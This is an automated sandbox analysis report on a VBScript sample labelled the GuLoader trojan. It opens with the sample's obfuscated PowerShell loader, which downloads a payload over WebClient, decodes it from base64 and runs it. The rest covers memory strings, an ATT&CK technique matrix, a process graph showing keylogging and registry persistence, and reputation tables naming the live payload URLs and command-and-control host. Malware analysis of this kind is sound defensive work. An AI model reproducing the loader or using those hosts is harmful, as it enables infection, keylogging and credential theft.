'sise,xa ';$thailndernes = sughs 'renchh o. u% a p p deagt ae%n\ e y.emlriak.e.0 .af.o,r h& &d be cehsot h$ ';thiocarbamic (sughs ' $ g.ltotbbaolr:kbfauc tce,r iuosp h aeg oruus,=n( c,mud, c/.c, v$ tvhha i lbnidaegr nke sb) ');thiocarbamic (sughs ' $ gbl,osbba l,:sdfitaosbtcedr eso.i seopm eurh=t$gdma ysbjeta.mk. s.p lpist,(,$ cuo l oul ittcei)p ');$daybeam=$diastereoisomer[0];thiocarbamic (sughs ' $.galuo b a.lr: nao.nuz eabvrlam=dnpe wf-,o,b,j emc t hs y.slteesmb.sn e t,.ew e b cslai.e.nvtf ');thiocarbamic (sughs ' $,n o,n.z e.b,rbab.ahle agdae r ss[ $ lioabcutlda r ira,]u= $ou,dbr,ja ');$nonassigned=sughs 'vn,oun z eab r,a ..dmoswfn loo,a dsfsi lieh(c$ dta yeb eaa m , $ fho nrt,etr.n.ersd7p2 )b ';$nonassigned=$bacteriophagous[1]+$nonassigned;$fonternes72=$bacteriophagous[0];thiocarbamic (sughs 'f$ gflso.b,a lf:rgaebn.kso mssrtredn,st=.(.tbe.s t -dpla tah j$bfcosn,tme r.n epse7 2 ) ');while (!$genkomstens) {thiocarbamic (sughs ' $fgllhofb,agl,: f jaosrdt e,nrdmead.ealfef=a$ tlrru ed ') ;thiocarbamic $nonassigned;thiocarbamic (sughs ' sptaa,r.th- s lueoe,pp 4p ');thiocarbamic (sughs 'v$sg l ocb,aul : gse n k ogmssptfe n sa=g( tke,s,tn-rpsagtbha m$ fpo n t,eoranteosd7.2d)k ') ;thiocarbamic (sughs ' $fg l o.bka,l : sjtur.aat e g.idcwael,=s$mgkl opbea,ls: s e rlgceva,nnt.s 2,3n+g+ % $ dgiea.srt,e,rsemosi sbo,mvehrb. cco uenct ') ;$daybeam=$diastereoisomer[$strategical];}thiocarbamic (sughs 'p$,galmonb a l :fpsrbaeerlue,c ttobrp s=, igoestb-cc o,n t efnbt u$.fdodnot evr nde s.7v2t ');thiocarbamic (sughs 'o$ g ldodbhallm:,flirjfiaa noe,r ecs l=u e[ s,y spt,e.mh.mcao n,v.e,rdtk] : :sfnr.odm bkabseep6u4dspt r isnlge(c$ pcr ave l e c.t.onrv) ');thiocarbamic (sughs 'c$.gbl,osbsadl : m,aoe gmb o t, .= p[astygs,t e m..gtde.x tt.he,n.cbo dki ngg ] :u:famsccti i .ggfe t s.t rai n gx(.$bf idjricaance.r e sn), ');thiocarbamic (sughs 'k$gg l ombsa ll: rpe,c,oanvcpill i a tri,otn s = $lm apefgmb o.t..bs udbvslt rfi nrg (,3,1 8t4 8k6w,s2a4.9t4p2p)a ');thiocarbamic $reconciliations;"Jump to behavior
              Source: wab.exe, 00000009.00000002.2953979686.00000000050FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2953979686.0000000005131000.00000004.00000020.00020000.00000000.sdmp, lmouitrs.dat.9.drBinary or memory string: [2024/04/25 15:12:13 Program Manager]
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6be679
              Source: wab.exe, 00000009.00000002.2953979686.000000000513E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managern
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers|
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager)
              Source: wab.exe, 00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 13 Program Manager]
              Source: wab.exe, 00000009.00000002.2953979686.000000000513E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerR
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000009.00000002.2953979686.000000000513E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2953979686.0000000005177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager[
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager70:0e
              Source: wab.exe, 00000009.00000002.2953979686.0000000005162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager71:1
              Source: wab.exe, 00000009.00000002.2953979686.0000000005131000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmp, lmouitrs.dat.9.drBinary or memory string: [2024/04/25 15:12:26 Program Manager]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\lmouitrs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\lmouitrs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts11
              Windows Management Instrumentation
              321
              Scripting
              1
              DLL Side-Loading
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              112
              Process Injection
              1
              Software Packing
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol11
              Input Capture
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              Security Account Manager111
              Security Software Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              Masquerading
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Modify Registry
              LSA Secrets41
              Virtualization/Sandbox Evasion
              SSHKeylogging212
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items112
              Process Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431648 Sample: PO_La-Tanerie04180240124.vbs Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 40 darvien99lakoustr01.duckdns.org 2->40 50 Snort IDS alert for network traffic 2->50 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 58 9 other signatures 2->58 11 wscript.exe 1 2->11         started        signatures3 56 Uses dynamic DNS services 40->56 process4 signatures5 60 VBScript performs obfuscated calls to suspicious functions 11->60 62 Suspicious powershell command line found 11->62 64 Wscript starts Powershell (via cmd or directly) 11->64 66 3 other signatures 11->66 14 powershell.exe 14 19 11->14         started        process6 dnsIp7 44 87.121.105.163, 49736, 49738, 80 NET1-ASBG Bulgaria 14->44 70 Suspicious powershell command line found 14->70 72 Very long command line found 14->72 74 Found suspicious powershell code related to unpacking or dynamic code loading 14->74 18 powershell.exe 17 14->18         started        21 conhost.exe 14->21         started        23 cmd.exe 1 14->23         started        signatures8 process9 signatures10 46 Writes to foreign memory regions 18->46 48 Found suspicious powershell code related to unpacking or dynamic code loading 18->48 25 wab.exe 5 8 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 42 darvien99lakoustr01.duckdns.org 94.156.79.69, 3770, 3771, 49739 NET1-ASBG Bulgaria 25->42 38 C:\Users\user\AppData\Roaming\lmouitrs.dat, data 25->38 dropped 68 Installs a global keyboard hook 25->68 32 cmd.exe 1 25->32         started        file13 signatures14 process15 process16 34 conhost.exe 32->34         started        36 reg.exe 1 1 32->36         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              PO_La-Tanerie04180240124.vbs33%ReversingLabsScript-WScript.Trojan.GuLoader
              PO_La-Tanerie04180240124.vbs45%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              bg.microsoft.map.fastly.net0%VirustotalBrowse
              darvien99lakoustr01.duckdns.org2%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://ocsp.suscerte.gob.ve00%URL Reputationsafe
              http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
              http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
              http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
              http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
              http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
              http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://crl.postsignum.cz/crl/psrootqca4.crl020%URL Reputationsafe
              http://policy.camerfirma.com00%URL Reputationsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://ocsp.pki.gva.es00%URL Reputationsafe
              http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://ca.mtin.es/mtin/ocsp00%URL Reputationsafe
              http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
              http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf00%URL Reputationsafe
              http://web.ncdc.gov.sa/crl/nrcacomb1.crl00%URL Reputationsafe
              http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
              http://www.dnie.es/dpc00%URL Reputationsafe
              http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://ca.mtin.es/mtin/DPCyPoliticas00%URL Reputationsafe
              https://repository.tsp.zetes.com00%URL Reputationsafe
              http://www.globaltrust.info00%URL Reputationsafe
              http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
              http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
              http://87.121.105.163/YSnpkrCwWalJFSpN146.bindumpsSexaideca.org.pe/1/YSnpkrCwWalJFSpN146.bin0%Avira URL Cloudsafe
              https://www.catcert.net/verarrel0%URL Reputationsafe
              http://www.disig.sk/ca0f0%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://certs.oati.net/repository/OATICA2.crl00%URL Reputationsafe
              http://www.defence.gov.au/pki00%Avira URL Cloudsafe
              http://www.globaltrust.info0=0%Avira URL Cloudsafe
              http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
              http://www.quovadis.bm00%URL Reputationsafe
              http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
              http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
              http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe
              http://www.accv.es000%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy-G200%URL Reputationsafe
              https://www.netlock.net/docs0%URL Reputationsafe
              http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
              http://87.121.105.163/Flyvnings.u32XR0%Avira URL Cloudsafe
              darvien99lakoustr01.duckdns.org0%Avira URL Cloudsafe
              http://ocsp.ncdc.gov.sa00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl00%URL Reputationsafe
              http://crl2.postsignum.cz/crl/psrootqca4.crl010%URL Reputationsafe
              http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
              http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%URL Reputationsafe
              http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;0%URL Reputationsafe
              https://repository.luxtrust.lu00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://www.acabogacia.org00%URL Reputationsafe
              http://87.121.105.1630%Avira URL Cloudsafe
              http://87.121.105.163/Flyvnings.u320%Avira URL Cloudsafe
              http://www.defence.gov.au/pki00%VirustotalBrowse
              darvien99lakoustr01.duckdns.org2%VirustotalBrowse
              http://87.121.105.163/YSnpkrCwWalJFSpN146.bin0%Avira URL Cloudsafe
              http://87.121.105.163/Flyvnings.u3221%VirustotalBrowse
              http://87.121.105.163/YSnpkrCwWalJFSpN146.bin11%VirustotalBrowse
              http://87.121.105.16318%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalseunknown
              darvien99lakoustr01.duckdns.org
              94.156.79.69
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              darvien99lakoustr01.duckdns.orgtrue
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://87.121.105.163/Flyvnings.u32false
              • 21%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://87.121.105.163/YSnpkrCwWalJFSpN146.binfalse
              • 11%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0wscript.exe, 00000000.00000003.1673116453.0000027B9DE0F000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.certplus.com/CRL/class3.crl0wscript.exe, 00000000.00000003.1673084183.0000027B9DE2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.e-me.lv/repository0wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.acabogacia.org/doc0wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.chambersign.org/chambersroot.crl0wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ocsp.suscerte.gob.ve0wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://87.121.105.163/YSnpkrCwWalJFSpN146.bindumpsSexaideca.org.pe/1/YSnpkrCwWalJFSpN146.binwab.exe, 00000009.00000002.2966034231.00000000208D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.postsignum.cz/crl/psrootqca2.crl02wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.dhimyotis.com/certignarootca.crl0wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://www.chambersign.org1wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.pkioverheid.nl/policies/root-policy0wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://repository.swisssign.com/0wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.suscerte.gob.ve/lcr0#wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.ssc.lt/root-c/cacrl.crl0wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://postsignum.ttc.cz/crl/psrootqca2.crl0wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlwscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://ca.disig.sk/ca/crl/ca_disig.crl0wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.certplus.com/CRL/class3P.crl0wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.suscerte.gob.ve/dpc0wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.certeurope.fr/reference/root2.crl0wscript.exe, 00000000.00000003.1673116453.0000027B9DE0F000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
